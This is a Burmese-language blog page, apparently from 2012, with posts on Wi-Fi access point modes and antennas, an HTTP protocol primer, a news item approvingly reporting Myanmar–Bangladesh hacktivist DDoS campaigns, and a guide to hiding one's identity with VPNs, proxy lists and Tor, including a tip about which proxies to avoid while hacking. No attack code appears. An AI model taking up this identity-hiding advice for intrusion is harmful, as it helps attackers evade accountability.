Wi-Fi ဆိုသည္မွာ Wireless Fidelity ျဖစ္ပါသည္။ Wifi သည္ Wireless Local Area Network (WLAN) အတြက္အသံုးျပုသည့္နည္းပညာတစ္ခုျဖစ္ပါသည္။ယင္း Wifi သည္ IEEE 802.11 Standard အားအေျခခံထားျခင္းျဖစ္ပါသည္။ Wifi သည္ IEEE 802.11b Standard ျဖစ္သည့္ Frequency 2.4GHz အားအသံုးျပုခဲ့ေသာ္လည္း ေနာက္ပိုင္းတြင္ IEEE 802.11 Standard မ်ားျဖစ္သည့္ (802.11a,802.11b,802.11g,802.11n) Standards မ်ားတြင္ပါ အသံုးျပုနိုင္ပါသည္။ Wifi နည္းပညာသည္ sender နွင့္ receiver အျကား Physical Wire Connection ျဖင့္အလုပ္မလုပ္ဘဲ Radio Frequency ျဖင့္သာ Data မ်ားေပးပို့ျခင္းနွင့္လက္ခံ ျခင္းမ်ားျပုလုပ္ျကပါသည္။ RF Current မ်ားအား Antenna ဆီသို့ေပးပို့ျပီး ထိုမွတဆင့္ Electromagnetic Field ဖန္တီးကာ ေလဟာနယ္မွတဆင့္ Propagate ျပုလုပ္ေပးျခင္းပင္ျဖစ္ပါ သည္။ ထိုသို့ RF အားအသံုးျပုျပီး Data မ်ားေပးပို့လက္ခံရန္အတြက္ မည္သည့္ Wifi Network မဆို Access Point လိုအပ္မည္ျဖစ္ပါသည္။ Access Point သည္ Infrastructure Mode အတြက္အသံုးျပုေသာျကားခံပစၥည္းတစ္ခု ျဖစ္ပါသည္။ Wireless Network အတြင္း wireless client မ်ားအျပန္အလွန္ခိ်တ္ဆက္မိေစရန္ အတြက္အသံုးျပုေသာ ပစၥည္းျဖစ္သည္။ယင္း Access Point တြင္ေအာက္ေဖာ္ျပပါ Mode (၃) ခုပါ ဝင္ပါသည္-

၁) Root Mode
၂) Repeater Mode
၃) Bridge Mode တို့ျဖစ္ပါသည္။

၁) Root Mode
Root Mode ဆိုသည္မွာယင္း Access Point မွတဆင့္ Wire Network သို့ခိ်တ္ဆက္ ျခင္းျဖစ္သည္။ Access Point မွ Wire Network သို့ခိ်တ္ဆက္ရာတြင္ ယင္း Access Point တြင္ ပါရိွသည့္ Ethernet Interface ျဖင့္တိုက္ရိုက္ခိ်တ္ဆက္ပါသည္။

၂ ) Repeater Mode
Repeater Mode ဆိုသည္မွာ Access Point မွတိုက္ရိုက္ခိ်တ္ထားသည့္ အျခားေသာ Access Point မွတဆင့္ Wire Network သို့ထပ္မံခိ်တ္ဆက္ျခင္းျဖစ္သည္။တနည္းအားျဖင့္ Repeater Mode အားအသံုးျပုထားသည့္ Access Point သည္ Upstream (Root Mode) အားအသံုးျပုထားသည့္ Access Point နွင့္ခိ်တ္ဆက္ကာ Wire Network သို့ထပ္မံခိ်တ္ဆက္ ျခင္းျဖစ္ပါသည္။
၃ ) Brigde Mode
Bridge Mode ဆိုသည္မွာ မတူညီသည့္ Access Point နွစ္ခုအျကားအခ်င္းခ်င္း အျပန္ အလွန္ခိ်တ္ဆက္မိေစရန္အတြက္ အသံုးျပုေသာ Mode ျဖစ္ပါသည္။ ေနာက္ထပ္ Wireless Antenna မ်ားအေၾကာင္းကို ထပ္မံ ရွင္းၿပပါ႔မယ္ ။
Wireless Antenna မ်ား
Wireless Network အား အကြာအေဝးပိုမိုခိ်တ္ဆက္မိေစရန္နွင့္ IEEE 802.11 Standard \ Range အားတိုးခဲ့်ေစရန္အတြက္ External Antenna မ်ားအား အသံုးၿပဳဖို႔ လိုအပ္လာပါတယ္ ။ ( Hand made Antenna မ်ားၿဖင္႔ ၿပဳလုပ္ႏိုင္ေသာ္လည္း ထိေရာက္မွု သိပ္မရွိလွတာကို ေတြ႕ရပါတယ္ ) Wireless Network တြင္ အဓိက အားျဖင့္ ေအာက္ေဖာ္ျပပါ Antenna မ်ားအား အသံုးျပုျကပါသည္ ။

၁) Omni Directional Antenna
၂) Directional Antenna တို့ျဖစ္ပါသည္။


၁ ) Omni Directional Antenna






Omni Directional Antenna သည္ Common Base Antenna အမို်းအစားျဖစ္ျပီး Point-to Multipoint စနစ္ျဖစ္ပါသည္။ ယင္း Antenna သည္ အျခားေသာ Computer ၊ Laptop ၊ PDA မ်ားဆီသို့ Signal မ်ားအား Distribute ျပုလုပ္သည့္အခါတြင္ Main Antenna အျဖစ္အသံုးျပုပါသည္။ Omni Directional Antennaတြင္ Wireless Wave မ်ားသည္ 360 ဒီဂရီ အတိုင္းသြားပါသည္။ထို့ေျကာင့္ Point-to-Point system တြင္ယင္း Antenna အားအသံုး ျပုမည္ဆိုပါက Signal range နည္းမည္ျဖစ္ပါသည္။ထို့ေျကာင့္ Point-to-Point system အတြက္ Omni Directional Antenna အား recommend မျပုလုပ္ျကပါ။ Omni directional Antenna အား Indoor Unit မ်ားအတြက္သာ အသံုးမ်ားပါသည္။

၂ )Directional Antenna

Directional Antenna မ်ားအား Outdoor Unit မ်ားတြင္ အသံုးျပုျကပါသည္။ ယင္း Antenna မ်ားသည္ Signal Wave အား 45 ဒီဂရီအတိုင္းသြားပါသည္။ Directional Antenna မ်ားအား Point-to-Point System မ်ားအတြက္အသံုးျပုျကျပီး၊ တစ္ခါတစ္ရံတြင္ တပ္ဆင္သည့္အ ေပၚမူတည္၍ Multipoint System အတြက္လည္းအသံုးျပုျကပါသည္။ ေအာက္ဆံုးက အင္တင္နာဆိုရင္ ထိုင္းဘတ္ ( ၉၀၀ ) ေလာက္ ေတာ႔ ရွိပါတယ္ ။ 

posted by gtone

Read More ->>

Saturday, June 23, 2012

News for Myanmar Cyberwarfare


ျမန္မာနို္င္ငံရခိုင္ျပည္နယ္မွာျဖစ္ပြားေနတဲ့ ရိုဟင္ဂ်ာ လူမ်ိဳးစုျပသနာမ်ားမွသည္ ျမန္မာနွင့္ဘဂၤလားေရွ ့္ ဟက္ကာမ်ား Cyber တိုက္ခိုက္မွဳအျပန္အလွန္ျဖစ္သည္
အထိတင္းမာခဲ့ႀကသည္။ျပည္တြင္း Underground Hacker မ်ားျဖစ္ႀကေသာ Blink Hacker Group၊ဦးေဆာင္၍ Operation Rohingya Group ကို Facebook
ေပၚတြင္တည္ေထာင္ျပီး ၁၂.၆.၂၀၁၂  ခန့္မွစ၍  Bangladesh Websiteမ်ားကိုစတင္တိုက္ခိုက္ခဲ့သည္။ထို ့ျပင္  အျခား Myanmar Hackers Group မ်ားပါ၀င္လာျပီး
Myanmar Cyber Army အဖြဲ ့ႀကီးကိုတည္ေထာင္ကာ Bangladesh Website မ်ားကိုဆက္လက္တိုက္ခိုက္ခဲ့သည္။ Bangladesh Hackerမ်ားဘက္ကလဲ
BBHG (Bangladesh Black Hat Group)၊Bangladesh Cyber Army စသည့္အဖြဲ ့စည္းမ်ားတည္ေထာင္ကာ ျမန္မာ၀က္ဘ္ဆိုက္မ်ားကို တိုက္ခိုက္ခဲ့သည္။
တိုက္ပြဲမွာျပင္းထန္လြန္းလွျပီး DDOS attack ကို နွစ္နို္င္ငံလံုးမွအသံုးခ်ခဲ့ႀကသည္။ အျပန္အလွန္ Cyber Army မ်ားက မိမိတို ့ Group Member မ်ား (Beginner)မ်ား
ကူညီတိုက္ခိုက္၍ရနိုင္ရန္ DDOS Toos မ်ား ၊ Training မ်ားကိုပို့ခ်ျပီးအဆက္ အျပတ္တိုက္ခိုက္ေနခဲ့ႀကသည္။၄င္းတိုက္ခိုက္မွဳမ်ားတြင္ နွစ္ဖက္နို္င္ငံမ်ားမွအင္အားေတာ္
ေတာ္မ်ားမ်ားပါ၀င္လွဳပ္ရွားခဲ့တာေတြ ့ရပါတယ္။DDOS ကအလြယ္ကူဆံုးတိုက္ခိုက္မွဳျဖစ္တာေႀကာင့္ Beginner မ်ားပါ၀င္တိုက္ခိုက္မွဳပိုမ်ားခဲ့တာျဖစ္ပါတယ္။
၂ ပတ္အတြင္းရရွိထားေသာစာရင္းမ်ားအရ ျမန္မာဘက္မွ ဘဂၤလားေရွ္ ့၀က္ဘ္ဆိုက္ ၁၀၀၀ ေက်ာ္ ရရွိထားျပီး ဘဂၤလားေရွ ့္ဘက္မွ ျမန္မာဆိုက္ ၃၀ ခန့္သာရရွိထားပါ
တယ္။ဒါအျပင္ Blink Hacker Group နွင့္ Myanmar Cyber Army စာမ်က္နွာမ်ားတြင္ေဖၚျပထားခ်က္မွာ ၂၃.၆.၂၀၁၂ ေန့ 4:00 ခန့္တြင္ ဘဂၤလားေရွ့္၏အႀကီးဆံုး Hosting ကို ျမန္မာဟက္ကာမ်ားကတိုက္ခိုက္နို္င္ခဲ့ျပီျဖစ္ေႀကာင္းသိရပါတယ္။Bangladesh Hacker မ်ားဘက္က Virus မ်ားကိုျမန္မာ
ဘက္သို ့ပို့လႊတ္ေနေႀကာင္း၊၄င္း Virus မ်ားနွင့္ ျမန္မာ၀က္ဘ္ဆိုက္မ်ားကို Myanmar Hackers မ်ားက Recovery လုပ္ေပးေနေႀကာင္းလဲသိရပါတယ္။
အဆိုပါသတင္းမ်ားအရ ဆိုက္ဘာတိုက္ခိုက္မွဳမ်ားဟာ ဆက္လက္ျဖစ္ပြားေနဆဲျဖစ္ျပီး၊ရိုဟင္ဂ်ာျပသနာမျပီးဆံုးသ၍ျဖစ္ပြားေနဦးမွာျဖစ္သည္ဟု ဟက္ကာအသိုင္း
အ၀ိုင္းမွ ေျပာႀကားသြားပါသည္။
News By 3thic0kiddi3

copy from ghostarea.net
Read More ->>

Tuesday, June 5, 2012

Introduction to HTTP Protocol



ဒီ post ေလးထဲမွာ HTTP Protocol အေၾကာင္းနည္းနည္းေလးေၿပာခ်င္ပါတယ္။

HTTP (Hyper Text Transfer Protocol) ဆိုတာ ကမၻာေပၚမွာအသံုးအမ်ားဆံုး protocol တခုပါ။ သူ.ကုိဘယ္ေနရာမွာ သံုးလဲဆုိေတာ့ ကြ်န္ေတာ္တုိ.ေန.တုိင္းသံုးေနၿမင္ေန ထိေတြ.ေနရတဲ. World Wide Web ၾကီးေပါ့ဗ်ာ။ကြ်န္ေတာ္တုိ. အေနနဲ.တကယ္လို. WWW ကုိသံုးေတာ့မယ္ဆုိရင္ မရိွမၿဖစ္လုိတဲ့အရာ ႏွစ္ခုရိွပါတယ္။ ပထမ တခုက browser ပါ။သူကေတာ့ client ေပါ့။ေနာက္တခုက ေတာ့ client ကုိ service ေပးမဲ့ server ေပါ့အဲဒါကေတာ့ web server ပါပဲ။ အသံုးမ်ားတဲ့ browser ေတြကေတာ့ firefox, Internet Explorer ေပါ့ဗ်ာ။ အသံုးမ်ားတဲ့ Web Server ေတြကေတာ့ IIS နဲ. Apache Web Server ေပါ့။ ကြ်န္ေတာ္တုိ.က ၾကိဳက္တဲ့ဆုိက္ကို ၾကိဳက္တဲ့ browser နဲ.ၾကည့္လို.ရတယ္ဗ်ာ။ အဲ web browser နဲ. အမ်ိဳးမ်ိဳးေသာ မတူညီတဲ့ Web Server ေတြဘယ္လုိဆက္သြယ္သလဲ အလုပ္လုပ္သလဲေပ့ါ။ အဲဒီမွာ မင္းသားၾကီးကေတာ့ HTTP protocol ေပါ့ဗ်ာ ။ Protocol ကုိၿမန္မာမွု.ၿပဳရင္ေတာ့ Client ကြန္ပ်ဳတာနဲ. Server ကြန္ပ်ဳတာၾကား နားလည္မွု.ယူထားတဲ့ လုိက္နာရမဲ့စည္းကမ္းေတြေပါ့။ ဟ ဘာစည္းကမ္းေတြတုံုးဆုိေတာ့ browser က server နဲ. Html ဖုိင္တခုကိုလိုခ်င္ရင္ ဘယ္လုိဆက္သြယ္ရမယ္။ ေဟာ server အေနနဲ. ဖုိင္ကုိရွာေပးနုိင္ရင္ client ကုိဘယ္လိုၿပန္အေၾကာင္းၿပန္ရမယ္ သူ.ရဲ. content ေတြကိုဘယ္လုိ ၿပန္ေပးရမယ္ စသည္ၿဖင့္ေပါ့ အဲဒါေတြကို သတ္မွတ္ထားတာေပါ့ဗ်ာ။
HTTP protocol က Network Layer ေတြရဲ.ဘယ္အေပၚမွာ အလုပ္လုပ္သလဲဆုိေတာ့ Transport Layer အေပၚမွာအလုပ္လုပ္ပါတယ္ ။ Transport Layer မွာ သူက TCP protocol ကုိသံုးပါတယ္. ဘာလုိ.လဲဆုိေတာ့ TCP ရဲ.သေဘာသဘာ၀က reliable data transfer ကိုေပးႏုိင္လုိ.ပါပဲ။ Reliable Data Transfer ဆိုတာကေတာ့ဗ်ာ တဖက္ကပုိ.လုိက္တဲ့ data packet ေတြကဟာမေပ်ာက္ပဲနဲ. တဖက္ကိုေရာက္ရိွႏုိင္တာကိုေၿပတာပါ။ အၿခားေသာ pouplar protocol ေတြၿဖစ္တဲ့ အီေမး ေတြအတြက္သံးုတဲ့ ွSMTP ဟာလည္း HTTP ကဲ့သုိ. TCP ကိုသံုးပါတယ္။ HTTP protocol ဟာ text based protocol ၿဖစ္ပါတယ္။ ဆုိခ်င္တာက မိတ္ေဆြအေနနဲ. HTTP protocol ကုိဖတ္ၿပီးေတာ့နားလည္ႏုိင္ပါတယ္ ဘာလုိ.လဲဆုိေတာ့ သူရဲ. Format က text ၿဖစ္တဲ့အတြက္ပါပဲ။ binary ဆုိရင္ေတာ့ ဖတ္လို.ခက္ပါလိမ့္မယ္။
Web Server ေတြနဲ. Web Client ေတြဟာ HTTP ကုိသံုးၿပီးဆက္သြယ္ပါတယ္။ ဆက္သြယ္မွု.ပံုစံကေတာ့ Request, Response model ၿဖစ္ပါတယ္။ Request, Response model ဆိုတာကေတာ့ဗ်ာ Web client က Web Server ဆီက တခုခုလိုခ်င္တယ္ဆုိပါေတာ့ အဲဒီအခ်ိန္မွာ Web Client ကေန Web Server ဆီကို HTTP request တခုလႊတ္လုိက္ပါတယ္။ အဲဒီ request ကုိ Web Server ကေနနားလည္ၿပီးေတာ့ web client ေတာင္းဆုိတာကို message တခုအေနနဲ.ၿပန္ေပးပါတယ္ response ေပါ့ဗ်ာ။ ဆုိခ်င္တာက HTTP Protocol အေပၚမွာဘာပဲလုပ္လုပ္ resquest လာမယ္ ၿပီးရင္ server ကေန response ၿပန္လာမယ္ေပါ့။ ဒီလိုနည္းနဲ.ပဲအလုပ္လုပ္ၾကပါတယ္။ ေနာက္ၿပီးေတာ့ resquest တခုနဲ.တခုကလဲ အဆက္အသြယ္ relation မရိွၾကပါဘူး။ အဲဒီမွာၾကံဳေတြ.ရတဲ့ၿပႆနာကေတာ့ session ၿပႆနာပါပဲ။ HTTP ဟာ request, response နဲ.သံုးတဲ့ stateless protocol ၿဖစ္တာေၾကာင့္ session ကုိ cookies ဒါမွမဟုတ္ တၿခားနည္းေတြနဲ.ေၿဖရွင္းရပါတယ္။ HTTP ဟာ statelss ၿဖစ္တယ္ဆုိတာ ေတာ့ ပထမလႊတ္လုိက္တဲ့ request နဲ. ဒုတိယလႊတ္လိုက္တဲ့ request ေတြဟာတူညီတဲ့ client ေတြၿဖစ္တယ္ဆုိတာ တနည္းအားၿဖင့္သူတုိ.ေတြဟာတဆက္တည္းၿဖစ္တယ္ဆုိတာ related ၿဖစ္တယ္ဆုိတာမသိတာပါပဲ။
ကဲ အခု HTTP Client ကေန Web Server ကိုဘယ္လုိ Request လႊတ္သလဲ Response ၿပန္သလဲဆုိတာကိုရွင္းပါ့မယ္။ Request, Response အားလံုးဟာ HTTP Message ေတြပါ။ သူတုိ.မွာတိက်တဲ့ format ပံုစံရိွပါတယ္ ဒါမွသာလွ်င္ various Web Server ေတြ Web Client ေတြဟာအတူတကြအလုပ္လုပ္ႏိုင္မွာပါ။ HTTP message ေတြမွာ request အတြက္ format တမ်ိဳး, response အတြက္ေတာ့သက္သက္တမ်ိဳးထားပါတယ္ ေအာက္ကပံုမွာ အဲဒါေတြကိုၿပထားပါတယ္။


အေပၚဆံုးပံုက က request message ကုိၿပထားတာပါ။
ဒုတိယပံုကေတာ့ reponse message ကုိၿပထားတပါ။ ဆုိပါေတာ့ဗ်ာ ကြ်န္ေတာ္တို.က server တခု ကေန /pet-products.txt ဖုိင္တဖုိင္ကုိလုိခ်င္တယ္ဆုိပါေတာ့ ဒါဆုိရင္ ပထမဆံုးပံု ပါအတုိင္းေတာင္းရမွာပါ။ အဲလုိေတာင္းမယ္ဆုိရင္ server အေနနဲ. ေတာင္းတဲ့ဖုိင္ကိုေပးႏုိင္တယ္ ဆုိရင္ ဒုတိယပံု အတုိင္း ၿပန္ေပးပါလိမ့္မယ္။ Request Message ကိုေသေသခ်ာခ်ာၾကည့္ရေအာင္ သူ.မွာ ႏွစ္ပုိင္းပါ ပါတယ္ ။ Strat Line ရယ္ request line ရယ္ေပါ့ဗ်ာ။ Start Line ဆုိတာ GET /pet-products. HTTP/1.1ေပါ့။ အဲ့မွာသံုးပုိင္းပါ ပါတယ္ GET ဆုိတာရယ္ /pet-products.txt ရယ္ HTTP/1.1 ရယ္ေပါ့။ GET ကေတာ့ HTTP method တခုပါ။ ဘယ္ေနရာမွာသံုးတာလဲဆုိေတာ့ resource တခုခုကို server ကေနေတာင္းခ်င္ရင္ သို.မဟုတ္ server side program တခုခုကို run ခ်င္ရင္သံုးပါတယ္။ ကြ်န္ေတာ္တုိ.ဟာ အခု /pet-products.txt ကိုေတာင္းတာၿဖစ္တဲ့အတြက္ GET ကုိသံုးတာပါ။ image တခုကိုလုိခ်င္ရင္လဲအဲလုိပဲေတာင္းရမွာပါ။ HTTP method ေနာက္မွလုိက္ရတာက ေတာ့လုိခ်င္တဲ့ resource ေပါ့ အခု ဒီမွာဆုိရင္ေတာ့ /pet-products.txt ေပါ့ဗ်ာ ။ ေနာက္ဆံုးအပုိင္းကေတာ့ HTTP protocol version ေပါ့။ ေလာေလာဆယ္ အသံုးအမ်ားဆံုး version ကေတာ့ HTTP/1.1 ပါပဲ။ HTTP/1.0 ကေတာ့ browser အေဟာင္းေတြမွာသံုးပါတယ္ ေတြ.ရခဲပါတယ္။ HTTP request နဲ.ေနာက္တပုိင္းကေတာ့ request line သို.မဟုတ္ body ေပါ့ဗ်ာ သူကေတာ့ request မွာလိုအပ္တဲ့တၿခား metadata ေတြကိုထည့္ေပးလုိက္ဖုိ.သံုးပါတယ္။ ဒီမွာဆုိရင္ Accept: ဆုိတဲ့ metadata ပါပါတယ္ သူကဘာေၿပာတာလဲဆုိရင္ client ကေနလက္ခံႏုိင္တဲ့ content type အမ်ိဳးအစားေတြပါ။ ဒီဥပမာ မွာဆုိရင္ အားလံုးလက္ခံတယ္ေပါ့ ။ေနာက္တခုက Host: ပါ အဲဒါကေတာ့ကြ်န္ေတာ္တုိ. Request ကိုလႊတ္တဲ့ computer ရဲ. IP သို.မဟုတ္ domain name ေပါ့ဗ်ာ။ အခုဥပမာေပးထားတဲ့ request ကုိ နားလည္ေအာင္ေၿပာရရင္ေတာ့ ေဟ့ web server ေရ ငါ့ကို /pet-products.txt ေပးစမ္းကြာ။ ငါက HTTP/1.1 ကုိသံုးထားတာကြ။ ငါကို.ရိွတာေပး လက္ခံႏုိင္တယ္ကြာ ေပါ့ဗ်ာ ။file ေတြပဲကြ။ ငါ့ရဲ. Host name က www.joes-hardware.com ကြလို.ေၿပာလိုက္တာပါ။ ဒီ request ကို TCP အေပၚကေန လုိခ်င္တဲ့ server ဆီကိုပုိ.လုိက္ရပါတယ္။ Web Serverေတြဟာမ်ားေသာအားၿဖင့္ TCP port 80 မွာ connection ေတြကိုလက္ခံၿပီးအလုပ္လုပ္ပါတယ္။ ဒီ request ကို web server ကနားလည္ၿပီးေတာ့ သူညြန္ၾကားတဲ့အတုိင္းလုပ္ပါလိမ့္မယ္။ အဆင္ေၿပရင္ response ၿပန္ေပးပါလိမ့္မယ္။ GET အၿပင္တၿခား HTTP method ေတြလဲရိွပါေသးတယ္။ popular ၿဖစ္တာကေတာ့ POST ေပါ့ ။သူက server မွာရိွတဲ့ program ကုိ run ဖုိ.အတြက္သံုးတာပါပဲ။ ကဲ GET နဲ.လဲလုပ္လုိ.ရသားနဲ. ဘာလုိ. POST ကုိသံုးတာလဲေပါ့။ GET နဲ.သာ server side program ကိုလွမ္း run မယ္ဆုိရင္ program အတြက္လုိအပ္တဲ့ parameter ေတြဟာ HTTP message ရဲ. Header သို.မဟုတ္ start line ကေနပို.တဲ့အတြက္ parameter ေတြကိုၿမင္ေနရပါတယ္။ POST ကုိသံုးတဲ့အခါ က်ေတာ့ parameter ေတြကိုmessage ရဲ. Body ကေနပို.တာၿဖစ္တဲ့အတြက္မၿမင္ရေတာ့ပါဘူး။ ေနာက္ သံုးလုိ.ရတဲ့ HTTP method ေတြကေတာ့
HEAD သူကေတာ့ header inforamation ေတာင္းရင္သံုးပါတယ္ ဥပမာ server အမ်ိဳးအစားနဲ. Versoin အဲဒါေတြလုိခ်င္ရင္သံုးပါတယ္။
PUT ကေတာ့ဗ်ာ တခုခုကို server မွာသြားတင္ခ်င္ရင္သံုးပါတယ္ server ေတာ္ေတာ္မ်ားမ်ားကအဲဒါကိုေပးမသံုးပါဘူးပိတ္ထားတတ္ပါတယ္
TRACE ကေတာ့ proxy server ေတြကေန web server ကုိဘယ္လိုသြားတယ္ဆုိတာသိခ်င္ရင္သံုးပါတယ္
OPTIONS ကေတာ့ server ကဘယ္ method ေတြကိုေပးသုံးလဲနဲ. ဘာေတြကို Handle လုပ္ႏုိင္လဲဆုိတာအတြက္သံုးပါတယ္
DELETE သူကေတာ့ server မွာရိွတဲ့ ဖုိင္ေတြကိုဖ်က္ဖုိ.သံုးပါတယ္ သူ.ကိုလဲ သာမာန္အားၿဖင့္ေပးမသံုးပါဘူး ပိတ္ထားေလ့ရိွပါတယ္။
အခု response message အေၾကာင္းရွင္းၾကရေအာင္။ ကြ်န္ေတာ္တုိ.ပို.လုိက္တဲ့ message ကုိ server ကနားလည္ၿပီးေတာ့ေတာင္းတာကိုေပးႏုိင္တယ္ဆုိပါေတာ့ဒါဆုိရင္ ဒုတိယပံု မွာပါတဲ့အတုိင္းၿပန္ေပးပါလိမ့္မယ္။ Response မွာသံုးပိုင္းပါပါတယ္ start line, header ရယ္ body ရယ္ေပါ့။ start line မွာေတာ့ HTTP/1.1 200 OK ဆုိတာေလးကိုေတြ.ပါလိမ့္မယ္ HTTP/1.1 ကေတာ့ version ပါ။ 200 ကေတာ့ server ဟာ client ရဲ. Request ကိုေအာင္ၿမင္တယ္ အုိေကတယ္ကိုအေၾကာင္းၿပန္တာပါ။ အဲဒါကို status code လို.ေခၚပါတယ္ ေအာင္ၿမင္ရင္ 200 ေပ့ါဗ်ာ သူ.ေနာက္က ok ကေတာ့ 200 ကုိ ကုိယ္စားၿပဴတဲ့စာသားပါပဲ။ status code ကိုၾကည့္ၿပီးေတာ့မွ browser ဟာသူဘာဆက္လုပ္ရမယ္ဆိုတာသိပါလိမ့္မယ္။ 200 အၿပင္တၿခားေသာ status code ေတြလဲရိွပါေသးတယ္။ အဲဒါေတြကထဲမွာအသံုးမ်ားတာ 403 Bad request, နဲ. 500 Internal Server Error တုိ.ပါပဲ။ start line ၿပီးသြားရင္ response header လာပါၿပီ။သူ.မွာလဲ response နဲ.ပတ္သတ္ၿပီးေတာ့ metadata ေတြကိုထည့္ဖုိ.သံုးတာပါပဲ။ ဥပမာ sound ဖုိင္တဖုိင္ဆုိရင္ ဘယ္လုိ အမ်ိဳးအစားလဲ အဲလိုအမ်ိဳးအစားသိေတာ့မွ ဘယ္ player နဲ. Run ရမယ္ဆုိတာ browser ကသိမွာပါ။ဒီ ဥပမာမွာၿပန္လာတာကေတာ့ Content-Type: text/plain ၿဖစ္ပါတယ္ ဒါဆုိရင္ browser အေနနဲ.အခုၿပန္လာတာဟာ text file တခုၿဖစ္တယ္ဆုိတာသိပါၿပီ အဲဒီေတာ့ ဒီ text file ကုိ display လုပ္ပါလိမ့္မယ္ အကယ္လုိ.သာ သူဟာ text/html ၿဖစ္ေနတယ္ဆုိရင္ အဲဒီ content ကုိ html အေနနဲ. Render (ပံုေဖာ္)ဖုိ.လုပ္မွာပါ။ Content-Type ေနာက္မွာပါလာတာကေတာ့ Content-Length: 19 ၿဖစ္ပါတယ္ သူကဘာကိုရည္ညြန္းတာလဲဆုိရင္ ၿပန္လာတဲ့ respone ရဲ. Message body ဟာ 56 bytes ရိွတယ္လုိ.ေၿပာတာပါ။အဲဒါကုိသိတဲ့အတြက္သာ web browser ဟာ messge body ထဲကေန ဘယ္ ႏွစ္byte ဖတ္ရမလဲဆုိတာသိမွာပါ။ ေၿပာဖို.က်န္ခဲ့တာကေတာ့ Start Line, message header, body ေတြကို \r\n newline နဲ.ၿခားထားတယ္ဆုိတာပါပဲ။ ေနာက္ဆံုးအပုိင္းကေတာ့ content ပါပဲ။ ကြ်န္ေတာ္တုိ.က text file တခုကိုေတာင္းတဲ့အတြက္ text ေတြပါလာတာပါ။ တကယ္လို. Html ဖုိင္တခုကုိသာေတာင္းခဲ့မယ္ဆုိရင္ html content ေတြရမွာပါ။ၿပန္လာတဲ့ response ကုိၾကည့္ၿပီးေတာ့ browser အေနနဲ. Content ကို render လုပ္ႏုိင္ပါၿပီ။ ကဲ အဆင္ေၿပမယ္လုိ.ေတာ့ေမွ်ာ္လင့္ပါတယ္ဗ်ာ။ HTTP protocol ကုိတကယ္စမ္းခ်င္ရင္ေတာ့ netcat, ဒါမွမဟုတ္ telnet နဲ.စမ္းလုိ.ရပါတယ္။ 

source http://mmcyberdevils.com/index.php?/topic/69-introduction-to-http-protocol/
Read More ->>

Staying Anonymous (part two)



ဒီေန႕ေတာ့ ေနာက္ထပ္တစ္ပိုင္းအေနနဲ႔ ကၽြန္ေတာ္ သိသေလာက္ဆက္လက္တင္ျပသြားမွာပါ..ဒီတစ္ခါလဲအမႊားပါသြားရင္ ေခြးလြတ္ေပးေစခ်င္ပါတယ္...။
အရင္တုန္းက offline protection ဆိုေတာ့ အခု ေနာက္တစ္ပိုင္းအေနနဲ႔ online protection ေပါ့...။

Online protection

Types of online protection

  1. VPN(s)
  2. Proxies
  3. Tor
  4. SSH Tunneling
တို႕ျဖစ္ၾကပါတယ္......။

VPN (Virtual Private Network)

တစ္မ်ိဳးအားျဖင့္ ေက်ာ္မယ္ခြမယ္ IP ေျပာင္းမယ္ဆိုရင္သံုးတယ္ဗ်...။ဘယ္လိုေျပာရမလဲဆိုေတာ့ သူဟာ
network တစ္မ်ိဳးျဖစ္ျပီးေတာ့ အဓိကအားျဖင့္ public telecommunication infrastructure ျဖစ္ပါတယ္...။
ေျပာမယ္ဆိုရင္ အမ်ားလည္းသံုးရတဲ့ network တစ္မ်ိဳးျဖစ္ျပီးေတာ့ ကၽြန္ေတာ္တို႕ websites ေတြ၀င္ေရာက္ တဲ့အခါ လံုျခံဳမႈကိုေပးျပီးေတာ့ IP ေတြကိုလဲ ေဖ်ာက္ဖ်က္ ေပးမွာျဖစ္ပါတယ္....ဥပမာအားျဖင့္ Myanmar နိုင္ ငံက IP ကို US က IP အျဖစ္ေျပာင္းလဲႏိုင္မွာပါ....။ဘေလာ့ဂါေတြအတြက္လဲ အခက္အခဲမရိွ ေက်ာ္ခြ သံုးႏိုင္ ပါတယ္...ဥပမာ skynet လိုင္သံုးတဲ့သူမ်ိဳးေတြအတြက္ တကယ္အသံုးတဲ့ပါတယ္...ဘေလာ့ဂါတိုင္းေဆာင္ ထားသင့္ပါတယ္....။ လူအမ်ားနဲ႕ သံုးလို႕ရတာေၾကာင့္ အေကာင့္တစ္ခုကို လူအမ်ားၾကီး သံုးဆြဲရင္ Bandwith မႏိုင္ရင္အသံုးျပဳရတာေလးကန္ႏိုင္ပါတယ္.....။

Free VPNs

Cyberghost
HotSpot Shield
Pro XPN
Open VPN

Paid VPNs

nVPN
SwissVPN 

HTTP Proxies and SOCKS5

ကၽြန္ေတာ္တို႕ အေနနဲ႕ ပရုပ္ဆီေျပာင္းျပီး လိုင္းေပၚမွာေနရာေျပာင္းႏိုင္ပါေသးတယ္...ေျမာက္မ်ားစြာေသာ
ပရုပ္ဆီ List ေတြကို ေအာက္ပါေနရာမ်ားကေန အလကာရယူလိုက္ပါ....။

Alive Proxy
Hide My Ass
Proxy list

မွတ္ခ်က္ Hide My Ass proxy ေတြကို Hacking လုပ္တဲ့ေနရာမွာမသံုးရ...။

Hackforums မွ proxy lists မ်ားကို ဒီေန ရာမွာရႏိုင္ေသးပါတယ္....။

Premium and Private SOCKS5 ေတြအတြက္ကေတာ့ Google search မွာရွာေဖြေလ့လာႏိုင္ပါေသး
တယ္...။

Some Proxy sites

ပရုပ္ဆီဆိုက္ေတြအမ်ားၾကီးရိွပါတယ္...လံုးျခံဳစိတ္ခ်ရေသာ ဆိုက္တစ္ခ်ိဳ႕ကိုတင္ျပေပးထားပါတယ္...

http://www.ninjacloak.com
http://www.hidemyass.com
http://go-between.me
http://ir2.me
http://rapidsurf.info
http://go-between.me
http://ir2.me
http://rapidsurf.info
http://yourownproxy.info
http://proxy.co.cc
http://iknownothing.org
http://accessyouth.info
http://buwk.com
http://UnblockFree.net
http://hillofbeans.biz
http://aptunnel.com
http://goaheadmakemyday.org
http://lameproxy.info
http://centerfoldproxy.info
http://proxylist.co
http://sneaky9.com
http://freesurfproxy.com
http://goflyakite.org
http://fastieproxy.com
http://ihaveacunningplan.info
http://schoolfreezone.com
http://proxify.net
http://passmethru.com
http://proxy2use.com
http://0001.cz.cc

ေက်ာ္လို႕ခြလို႕လဲ အဆင္ေျပႏိုင္ပါတယ္....။

Tor

Tor ဆိုတာအလာရတဲ့ free software ျဖစ္ပါတယ္....သင့္ secure browsing တြက္လိုအပ္တဲ့ေဆာ့၀ဲပါ...
Hide anonymous လုပ္ႏိုင္တဲ့အျပင္ မိမိ IP address ကိုပါေနရာေရြ႕ ႏိုင္ပါေသးတယ္..။

